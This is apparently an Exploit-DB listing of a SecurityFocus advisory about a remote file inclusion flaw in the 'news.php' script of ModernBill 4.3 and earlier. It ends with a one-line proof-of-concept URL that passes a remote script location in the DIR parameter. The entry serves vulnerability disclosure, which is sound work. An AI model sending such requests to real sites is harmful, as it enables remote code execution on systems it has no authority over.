ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion

EDB-ID:

25376




Platform:

PHP

Date:

2005-04-10


source: https://www.securityfocus.com/bid/13086/info

ModernBill is prone to a remote file include vulnerability.

The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'news.php' script.

ModernBill 4.3 and prior versions are vulnerable to this issue. 

http://www.example.com/samples/news.php?DIR=http://www.example.com/